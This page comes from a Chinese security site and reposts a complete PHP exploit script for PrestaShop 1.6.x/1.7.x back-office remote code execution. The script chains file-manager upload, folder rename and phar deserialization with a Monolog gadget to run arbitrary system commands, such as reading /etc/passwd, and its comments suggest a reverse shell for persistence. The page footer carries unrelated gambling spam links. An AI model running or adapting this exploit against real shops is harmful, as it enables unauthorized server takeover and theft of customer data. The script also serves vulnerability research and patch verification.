首頁 | 安全文章 | 安全工具 | Exploits | 本站原創 | 關于我們 | 網站地圖 | 安全論壇
  當前位置:主頁>安全文章>文章資料>Exploits>文章內容
PrestaShop 1.6.x / 1.7.x Remote Code Execution
來源:https://github.com/farisv 作者:farisv 發布時間:2018-12-12  
<?php
/**
 * 
 * PrestaShop 1.6.x <= 1.6.1.23 & 1.7.x <= 1.7.4.4 - Back Office Remote Code Execution
 * See https://github.com/farisv/PrestaShop-CVE-2018-19126 for explanation.
 * 
 * Chaining multiple vulnerabilities to trigger deserialization via phar.
 *
 * Date:
 *   December 1st, 2018
 *
 * Author:
 *   farisv
 *
 * Vendor Homepage:
 *   https://www.prestashop.com/
 *
 * Vulnerable Package Link:
 *   https://assets.prestashop2.com/en/system/files/ps_releases/prestashop_1.7.4.3.zip
 *
 * CVE :
 *   - CVE-2018-19126
 *   - CVE-2018-19125
 * 
 * Prerequisite:
 *   - PrestaShop 1.6.x before 1.6.1.23 or 1.7.x before 1.7.4.4.
 *   - Back Office account (logistician, translator, salesman, etc.).
 * 
 * Usage:
 *   php exploit.php back-office-url email password func param
 * 
 * Example:
 *   php exploit.php http://127.0.0.1/admin-dev/ [email protected] 54l35m4n123
 *   system 'cat /etc/passwd'
 * 
 * Note:
 * Note that the upload directory will be renamed and you can't upload the
 * malicious phar file again if the folder name is not reverted. You might want
 * to execute reverse shell to gain persistence RCE or include the command to
 * rename the folder again in your payload (you need to know the path to the
 * upload directory).
 * 
 * FOR EDUCATIONAL PURPOSES ONLY. DO NOT USE THIS SCRIPT FOR ILLEGAL ACTIVITIES.
 * THE AUTHOR IS NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE.
 * 
 */

namespace PrestaShopRCE {

    class Exploit {
        private $url;
        private $email;
        private $passwd;
        private $cmd;
        private $func;
        private $param;

        public function __construct($url, $email, $passwd, $func, $param) {
            $this->url = $url;
            $this->email = $email;
            $this->passwd = $passwd;
            $this->func = $func;
            $this->param = $param;
        }

        private function post($path, $data, $cookie) {
            $curl_handle = curl_init();
            
            $options = array(
                CURLOPT_URL => $this->url . $path,
                CURLOPT_HEADER => true,
                CURLOPT_POST => 1,
                CURLOPT_POSTFIELDS => $data,
                CURLOPT_RETURNTRANSFER => true,
                CURLOPT_COOKIE => $cookie
            );
            
            curl_setopt_array($curl_handle, $options);
            $raw = curl_exec($curl_handle);
            curl_close($curl_handle);

            return $raw;
        }

        private function fetch_cookie($raw) {
            $header = "Set-Cookie: ";
            $cookie_header_start = strpos($raw, $header);
            $sliced_part = substr($raw, $cookie_header_start + strlen($header));
            $cookie = substr($sliced_part, 0, strpos($sliced_part, ';'));
            return $cookie;
        }

        public function run() {

            // Login and get PrestaShop cookie
            $data = array(
                'email' => $this->email,
                'passwd' => $this->passwd,
                'submitLogin' => '1',
                'controller' => 'AdminLogin',
                'ajax' => '1'
            );
            $cookie = "";
            $raw = $this->post('/', $data, $cookie);
            $prestashop_cookie = $this->fetch_cookie($raw);

            // Get FileManager cookie
            $data = array();
            $cookie = $prestashop_cookie;
            $raw = $this->post('/filemanager/dialog.php', $data, $cookie);
            $filemanager_cookie = $this->fetch_cookie($raw);

            // Craft deserialization gadget
            $gadget = new \Monolog\Handler\SyslogUdpHandler(
                new \Monolog\Handler\BufferHandler(
                    ['current', $this->func],
                    [$this->param, 'level' => null]
                )
            );

            // Craft malicious phar file
            $phar = new \Phar('phar.phar');
            $phar->startBuffering();
            $phar->addFromString('test', 'test');
            $phar->setStub('<?php __HALT_COMPILER(); ? >');
            $phar->setMetadata($gadget);
            $phar->stopBuffering();

            // Change the extension
            rename('phar.phar', 'phar.pdf');

            // Cookie for next requests
            $cookie = "$prestashop_cookie; $filemanager_cookie";

            // Upload phar.pdf
            $curl_file = new \CurlFile('phar.pdf', 'application/pdf', 'phar.pdf');
            $data = array(
                'file' => $curl_file
            );
            $raw = $this->post('/filemanager/upload.php', $data, $cookie);

            // Rename image directory to bypass realpath() check
            $data = array(
                'name' => 'renamed'
            );
            $raw = $this->post(
                '/filemanager/execute.php?action=rename_folder',
                $data,
                $cookie
            );

            // Trigger deserialization
            // The '/img/cms/' substring is important to bypass string check
            $data = array(
                'path' => 'phar://../../img/renamed/phar.pdf/img/cms/'
            );
            $raw = $this->post(
                '/filemanager/ajax_calls.php?action=image_size',
                $data,
                $cookie
            );

            // Display the raw result
            print $raw;

        }
    }

}

/*
 * Based on
 * https://github.com/ambionics/phpggc/blob/master/gadgetchains/Monolog/RCE/1/
*/
namespace Monolog\Handler {

    class SyslogUdpHandler {
        protected $socket;

        function __construct($param) {
            $this->socket = $param;
        }
    }

    class BufferHandler {
        protected $handler;
        protected $bufferSize = -1;
        protected $buffer;
        protected $level = null;
        protected $initialized = true;
        protected $bufferLimit = -1;
        protected $processors;

        function __construct($methods, $command) {
            $this->processors = $methods;
            $this->buffer = [$command];
            $this->handler = clone $this;
        }
    }

}

namespace {

    if (count($argv) != 6) {
        $hint = "Usage:\n  php $argv[0] back-office-url email password func param\n\n";
        $hint .= "Example:\n  php $argv[0] http://127.0.0.1/admin-dev/ ";
        $hint .= "[email protected] 54l35m4n123 system 'uname -a'";
        die($hint);
    }

    if (!extension_loaded('curl')) {
        die('Need php-curl');
    }

    $url = $argv[1];
    $email = $argv[2];
    $passwd = $argv[3];
    $func = $argv[4];
    $param = $argv[5];

    $exploit = new PrestaShopRCE\Exploit($url, $email, $passwd, $func, $param);
    $exploit->run();

}
            


 
[推薦] [評論(0條)] [返回頂部] [打印本頁] [關閉窗口]  
匿名評論
評論內容:(不能超過250字,需審核后才會公布,請自覺遵守互聯網相關政策法規。
 §最新評論:
  熱點文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·VideoScript 3.0 <= 4.0.1.50 Of
  相關文章
·SmartFTP Client 9.0.2623.0 Den
·WordPress Snap Creek Duplicato
·LanSpy 2.0.1.159 Buffer Overfl
·WebDAV Server Serving DLL
·Linux userfaultfd tmpfs File P
·WebKit JIT Proxy Object Issue
·Windows UAC Protection Bypass
·CyberLink LabelPrint 2.5 Stack
·Safari Proxy Object Type Confu
·Google Chrome 70.0.3538.77 Cro
·UltraISO 9.7.1.3519 Output Fil
·XNU POSIX Shared Memory Mappin
  推薦廣告
CopyRight © 2002-2019 VFocuS.Net All Rights Reserved
北京单场4串1是什么意思 168财神捕鱼 同城游里的美女捕鱼 至尊娱乐棋牌app下载 11选5任3必中计算方法 9肖计算公式 广西11选走势图一定牛 合彩平特肖怎么杀一肖 云南普洱麻将下载 幸运赛车计划网站 捕鱼大师稳赢版现金